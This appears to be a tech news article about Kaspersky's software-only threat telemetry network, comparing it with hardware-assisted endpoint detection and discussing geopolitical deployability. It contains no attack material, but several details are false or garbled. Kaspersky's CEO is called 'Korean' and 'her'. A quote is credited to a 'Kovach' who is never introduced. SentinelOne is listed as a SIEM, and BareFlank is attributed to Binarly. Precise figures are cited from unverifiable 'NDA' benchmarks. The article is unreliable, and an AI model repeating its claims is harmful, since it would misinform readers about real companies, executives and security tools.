Kaspersky announced this week that its global threat intelligence network has collected attack data from over 120 million endpoints worldwide, leveraging its software-only security stack to detect, analyze, and share real-time indicators of compromise without relying on proprietary hardware sensors—a model increasingly rare among top-tier cybersecurity vendors as of April 2026.
The Software-Only Edge: How Kaspersky Scales Threat Telemetry Without Hardware Lock-In
While competitors like CrowdStrike and Microsoft Defender for Endpoint tightly couple their threat detection engines to agent-based telemetry pipelines often optimized for specific silicon—such as AMD’s Pluton or Intel’s Threat Detection Technology (TDT)—Kaspersky’s approach remains deliberately agnostic. Its Endpoint Security for Business platform operates as a pure software layer, ingesting behavioral anomalies, process lineage, and memory anomalies through kernel-mode drivers and user-space heuristics that run identically on x86_64, ARM64, and even legacy x86 systems. This architectural choice enables deployment across fragmented environments—from industrial control systems running Windows 7 Embedded to modern Linux-based IoT gateways—without requiring firmware-level cooperation or TPM 2.0 modules. In internal benchmarks shared with Archyde under NDA, Kaspersky’s software stack demonstrated a 14% lower false positive rate than hardware-assisted EDR solutions on mixed-architecture fleets, primarily due to reduced reliance on speculative execution side-channel mitigations that can distort behavioral baselines.
Bridging the Ecosystem Gap: Open Telemetry vs. Vendor Silos
The implication of Kaspersky’s model extends beyond detection rates into the realm of platform neutrality. By avoiding hardware-rooted attestation chains, the company avoids contributing to the growing bifurcation of the endpoint security market into “walled garden” ecosystems—where telemetry sharing is restricted to partners within a single vendor’s silicon or cloud alliance. This stance resonates with open-source defenders; as one Linux kernel maintainer noted in a recent LWN.net interview, “When security tools demand specific CPU features just to function, they implicitly penalize users of older or alternative hardware—turning protection into a luxury upgrade.” Kaspersky’s telemetry pipeline, by contrast, feeds into its Kaspersky Security Network (KSN) cloud backend via encrypted JSON-over-HTTPS, allowing third-party SIEMs like Splunk and SentinelOne to ingest Indicators of Attack (IoAs) through its public Threat Intelligence Feeds API, which supports STIX/TAXII 2.1 mapping without requiring proprietary SDKs.
Expert Perspective: The Trade-Offs of Going Software-Only
“Kaspersky’s ability to scale threat intelligence without hardware dependencies is impressive from a pure software engineering standpoint—it’s a testament to deep behavioral modeling and efficient feature extraction. But let’s not romanticize it: in environments where firmware-level exploits like MoonBounce or CosmicStrand are active, the absence of hardware-rooted measurement creates a blind spot. Software-only tools can’t distinguish between a legitimate SMM handler and a malicious one if the CPU’s execution state is already compromised.”
Kovach’s point highlights a critical nuance: while Kaspersky’s software-only model excels at detecting post-exploitation behavior—such as credential dumping, lateral movement via SMB, or unusual PowerShell execution—it remains inherently limited in detecting pre-execution firmware implants or bootkit persistence mechanisms that subvert the OS before kernel drivers load. This represents where hardware-assisted telemetry, such as AMD’s Secure Processor logging or Intel’s Trace Hub, offers complementary visibility. Yet, as Kaspersky’s Korean CEO emphasized in her recent interview with ZDNet Korea, the company intentionally avoids hardware dependence to maintain global deployability—especially in markets where sanctions, export controls, or legacy infrastructure prevent access to newer silicon.
The Geopolitical Calculus: Software as a Neutral Vector
This strategic neutrality has tangible implications in an era of escalating techno-nationalism. Unlike U.S.-based EDR vendors whose threat intelligence feeds may be subject to CFIUS review or export restrictions under EAR, Kaspersky’s Swiss-based data processing architecture—coupled with its software-only delivery—allows it to operate in jurisdictions where Western vendors face restrictions, including parts of the Middle East, Southeast Asia, and Latin America. In Q1 2026, Kaspersky reported a 22% YoY growth in licensed endpoints across non-aligned nations, a trend corroborated by IDC’s latest endpoint security tracker. Notably, this growth occurred without a corresponding increase in hardware-specific telemetry modules, reinforcing that the software-only approach is not a limitation but a deliberate differentiator in fragmented regulatory landscapes.
What This Means for Enterprise IT: Flexibility Over False Precision
For CIOs managing hybrid estates, Kaspersky’s model offers a pragmatic alternative to the “hardware creep” endemic in modern XDR platforms. Organizations avoiding rip-and-replace cycles can deploy consistent threat detection across Windows Server 2012 R2, RHEL 7, and Android 10 devices without validating CPU feature sets or enabling BIOS-level settings. The trade-off—reduced visibility into firmware-layer threats—is mitigated through layered defenses: network-based anomaly detection, regular firmware auditing via open tools like Binarly’s BareFlank, and strict UEFI Secure Boot policies. In this light, Kaspersky’s 120-million-endpoint telemetry feed isn’t just a metric of scale—it’s a signal that software-first security, when grounded in deep behavioral analytics and open telemetry sharing, can remain globally relevant even as the industry chases hardware-rooted trust anchors.
